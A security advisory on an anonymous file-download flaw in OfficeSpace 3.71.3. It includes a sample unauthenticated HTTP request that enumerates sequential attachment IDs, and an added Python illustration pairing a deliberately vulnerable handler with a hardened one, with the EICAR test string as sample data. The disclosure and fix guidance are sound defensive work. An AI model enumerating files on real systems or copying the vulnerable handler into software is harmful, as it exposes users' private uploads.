#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  OfficeSpace [1]
# Vendor:   OfficeSpace Software Inc.
# CSNC ID:  CSNC-2018-019
# Subject:  Anonymous File Download
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Stephan Sekula
# Date:     18.04.2018
#
#############################################################

Introduction:
-------------
The smarter, easier way to manage your space. [1]

Compass Security discovered a security flaw in OfficeSpace which allows
anonymous users to download files that authenticated users have uploaded.

Affected:
---------
Vulnerable:
 * Version 3.71.3

Technical Description
---------------------
Users are able to upload files (attachments) to the system. The download
endpoint for these files does not check whether the requester is
authenticated, so uploaded files can be retrieved by anonymous users.
Because attachment IDs are assigned sequentially, an attacker does not
need to know a specific ID: iterating over the ID space enumerates every
uploaded file.

Request (accessing an uploaded file without being authenticated, i.e.
without any session cookie or Authorization header):

GET /request-manager/attachments/14/download HTTP/1.1
Host: [CUT].officespacesoftware.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response (the file is served; the 68-byte body is the EICAR test string
that was uploaded during the test):

HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 05:28:56 GMT
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain
Content-Disposition: attachment; filename="eicar.com.txt"
Content-Transfer-Encoding: binary
Cache-Control: private
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
Content-Length: 68
Connection: close

[EICAR-STRING]

Workaround / Fix:
-----------------
This issue can be fixed by checking the user's authentication and
authorization on every download request: the requester must have a valid
session, and that user must be permitted to read the particular attachment
being requested. Further, file IDs should be long and random so that they
cannot be enumerated; this is defence in depth and does not replace the
per-request access check.
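The following is an added example illustrating the fix described above; it is
not OfficeSpace code and says nothing about how the vendor implemented the
patch. The data model, the Request/Store classes and the handler signatures
are assumptions made for the illustration. It places the behaviour the advisory
describes (lookup by sequential integer, no check of who is asking) next to a
hardened handler that authenticates first, then authorizes against the specific
object, and looks attachments up by an unguessable random token instead of a
sequential ID.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Iterable, Optional, Set, Tuple

# (status code, response headers, body)
Response = Tuple[int, Dict[str, str], bytes]


@dataclass
class Attachment:
    filename: str
    owner: str               # user who uploaded the file
    readers: Set[str]        # other users allowed to download it
    data: bytes


@dataclass
class Store:
    """Assumed storage. Attachments are reachable two ways: by a legacy
    sequential ID (what the vulnerable endpoint exposes) and by a random token."""
    by_id: Dict[int, Attachment] = field(default_factory=dict)
    by_token: Dict[str, Attachment] = field(default_factory=dict)

    def add(self, filename: str, owner: str, data: bytes,
            readers: Iterable[str] = ()) -> Tuple[int, str]:
        att = Attachment(filename, owner, set(readers), data)
        seq_id = len(self.by_id) + 1          # 1, 2, 3, ...: trivially enumerable
        token = secrets.token_urlsafe(32)     # 256 random bits: not enumerable
        self.by_id[seq_id] = att
        self.by_token[token] = att
        return seq_id, token


@dataclass
class Request:
    user: Optional[str]      # None when the request carries no valid session


def _serve(att: Attachment) -> Response:
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{att.filename}"',
        "Cache-Control": "private",
    }
    return 200, headers, att.data


def download_vulnerable(store: Store, req: Request, attachment_id: int) -> Response:
    """The behaviour the advisory describes: the file is looked up by its
    sequential ID and served without looking at who is asking, so an anonymous
    client can walk attachment_id = 1, 2, 3, ... and collect every upload."""
    att = store.by_id.get(attachment_id)
    if att is None:
        return 404, {}, b""
    return _serve(att)


def download_hardened(store: Store, req: Request, token: str) -> Response:
    """Authenticate, then authorize against the specific object, then serve.
    An unknown token and a token the user may not read both get the same 404,
    so the endpoint does not confirm which tokens exist."""
    if req.user is None:                                   # authentication: who are you?
        return 401, {}, b""
    att = store.by_token.get(token)
    if att is None or (req.user != att.owner and req.user not in att.readers):
        return 404, {}, b""                                # authorization: may you read this?
    return _serve(att)


def build_sample_store() -> Tuple[Store, int, str]:
    """Constructed sample data: the EICAR test file the advisory downloaded
    (68 bytes, matching the Content-Length in the recorded response)."""
    store = Store()
    eicar = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    seq_id, token = store.add("eicar.com.txt", "alice", eicar, readers={"bob"})
    return store, seq_id, token


if __name__ == "__main__":
    store, seq_id, token = build_sample_store()
    anon = Request(user=None)
    print("vulnerable, anonymous, id", seq_id, "->", download_vulnerable(store, anon, seq_id)[0])
    print("hardened, anonymous     ->", download_hardened(store, anon, token)[0])
    print("hardened, user mallory  ->", download_hardened(store, Request("mallory"), token)[0])
    print("hardened, user bob      ->", download_hardened(store, Request("bob"), token)[0])
```

The order of the checks matters: the session check alone would have stopped the
anonymous download in the advisory, but without the per-object check any logged-in
user could still fetch every other user's uploads, which is the same class of bug
one login away. The random token only raises the cost of guessing; it is not what
makes the handler safe.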
Timeline:
---------
2018-07-31: Public disclosure date
2018-05-02: Initial vendor response
2018-04-23: Initial vendor notification
2018-04-18: Discovery by Stephan Sekula

References:
-----------
[1] https://www.officespacesoftware.com